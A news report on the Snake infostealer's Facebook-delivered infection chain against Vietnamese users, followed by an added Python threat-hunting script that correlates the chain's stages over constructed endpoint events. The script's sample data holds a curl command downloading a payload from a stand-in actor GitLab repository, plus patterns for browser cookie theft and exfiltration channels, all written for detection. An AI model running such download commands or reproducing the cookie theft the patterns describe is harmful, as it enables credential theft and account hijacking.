New research has revealed that threat actors are using Facebook messages to deliver a Python-based information stealer known as Snake.
Cybereason researchers have shared details of the attack, indicating that Snake's primary goal is to capture credentials and other sensitive data from unsuspecting users.
It appears to be a relatively new campaign, first reported on X in August 2023, and its victims skew toward Vietnamese users.
Facebook information thief targets Vietnamese users
The attack uses seemingly harmless RAR or ZIP files that, once opened, trigger an infection sequence involving two additional downloaders: a batch script and a cmd script. The cmd script is responsible for downloading and executing the Snake stealer from an actor-controlled GitLab repository.
Cybereason has identified three distinct variants of the Snake infostealer; the third is an executable built with PyInstaller and targets users of the Coc Coc browser, suggesting a specific focus on Vietnamese users.
Once collected, credentials and cookies are exfiltrated through a number of platforms, including Discord, GitHub, and Telegram.
The malware also targets Facebook accounts by extracting their cookies, which points to account hijacking as the likely goal.
The Vietnam connection is further reinforced by the naming conventions of the actor-controlled repositories and by what are reported to be Vietnamese-language references in the source code.
Cybereason also noted that the malware targets other widely used browsers, including Brave, Chromium, Google Chrome, Microsoft Edge, Mozilla Firefox and Opera.
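The chain described above (archive opened, batch/cmd script launched, stealer fetched from GitLab, browser cookie databases read, results sent out over Discord, GitHub or Telegram) gives a defender four observable stages. The script below is an added example, not code from the article or from Cybereason: it runs a simple stage-based hunt over constructed Sysmon-style endpoint events. The event layout, the rule names, the three-stage threshold and the assumption that Coc Coc's browser binary is named `browser.exe` are all assumptions made for this example, not published indicators.

```python
"""Hunt for the Snake-style infection chain in constructed endpoint telemetry.

Added example; the events, field names, rule names and thresholds are
assumptions for illustration, not indicators published by Cybereason.
"""
import re
from collections import defaultdict

# Browser binaries that legitimately touch their own cookie databases.
# browser.exe is assumed to be the Coc Coc browser binary.
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe",
            "firefox.exe", "chromium.exe", "browser.exe"}
ARCHIVERS = re.compile(r"(winrar|7zfm|7zg|bandizip|explorer)\.exe$", re.I)
TEMP_SCRIPT = re.compile(r"\\Temp\\.*\.(bat|cmd)\b", re.I)
DOWNLOADERS = {"curl.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe"}
# Chromium-family "Cookies" file under a profile, or Firefox cookies.sqlite.
COOKIE_DB = re.compile(r"(\\User Data\\.*\\Cookies|\\cookies\.sqlite)$", re.I)
EXFIL_HOSTS = {"discord.com", "discordapp.com", "api.telegram.org",
               "api.github.com"}

# Constructed events: pc1 shows the full chain, pc2 is benign browsing.
EVENTS = [
    {"host": "pc1", "type": "process",
     "parent": r"C:\Program Files\WinRAR\WinRAR.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\Rar$DIa0.123\invoice.bat"'},
    {"host": "pc1", "type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl -s -o %TEMP%\\s.py https://gitlab.com/example-actor/repo/-/raw/main/s.py"},
    {"host": "pc1", "type": "file",
     "image": r"C:\Users\u\AppData\Local\Temp\python.exe",
     "path": r"C:\Users\u\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies"},
    {"host": "pc1", "type": "network",
     "image": r"C:\Users\u\AppData\Local\Temp\python.exe",
     "dest": "api.telegram.org", "port": 443},
    {"host": "pc2", "type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe"},
    {"host": "pc2", "type": "network",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest": "api.telegram.org", "port": 443},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev):
    """Map one event to a chain stage, or None if it matches nothing."""
    kind, img = ev["type"], basename(ev["image"])
    if kind == "process":
        cmd = ev["cmdline"]
        # Stage 1: an archiver (or Explorer) spawns cmd.exe on a script in Temp.
        if img == "cmd.exe" and ARCHIVERS.search(ev["parent"]) and TEMP_SCRIPT.search(cmd):
            return "archive_spawned_script"
        # Stage 2: a command-line downloader pulls something from gitlab.com.
        if "gitlab.com" in cmd.lower() and (
                img in DOWNLOADERS
                or re.search(r"invoke-webrequest|downloadstring|downloadfile", cmd, re.I)):
            return "gitlab_fetch"
    elif kind == "file":
        # Stage 3: a non-browser process opens a browser cookie database.
        if COOKIE_DB.search(ev["path"]) and img not in BROWSERS:
            return "cookie_db_read"
    elif kind == "network":
        # Stage 4: a non-browser process talks to a known exfil channel.
        if ev["dest"].lower() in EXFIL_HOSTS and img not in BROWSERS:
            return "exfil_channel"
    return None


def hunt(events):
    """Return {host: sorted list of chain stages seen on that host}."""
    hits = defaultdict(set)
    for ev in events:
        tag = classify(ev)
        if tag:
            hits[ev["host"]].add(tag)
    return {h: sorted(tags) for h, tags in hits.items()}


def suspicious_hosts(events, min_stages=3):
    """Hosts on which at least min_stages distinct stages were observed."""
    return sorted(h for h, tags in hunt(events).items() if len(tags) >= min_stages)


if __name__ == "__main__":
    for host, stages in hunt(EVENTS).items():
        print(host, stages)
    print("suspicious:", suspicious_hosts(EVENTS))
```

Each stage is noisy on its own (curl fetching from gitlab.com is routine on a developer machine, and a backup agent may legitimately read a cookie file), which is why the hunt correlates stages per host and only escalates when several co-occur; the threshold of three is an arbitrary starting point to tune against your own telemetry.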
The discovery comes amid increased scrutiny of Facebook for its apparent failure to help account takeover victims.
TechRadar Pro has asked Meta to share information on how users can increase their protection against these types of attacks and whether the company has any plans to prevent future attacks. In the meantime, users can follow best practices to help protect their accounts, including using complex passwords and two-factor authentication (2FA).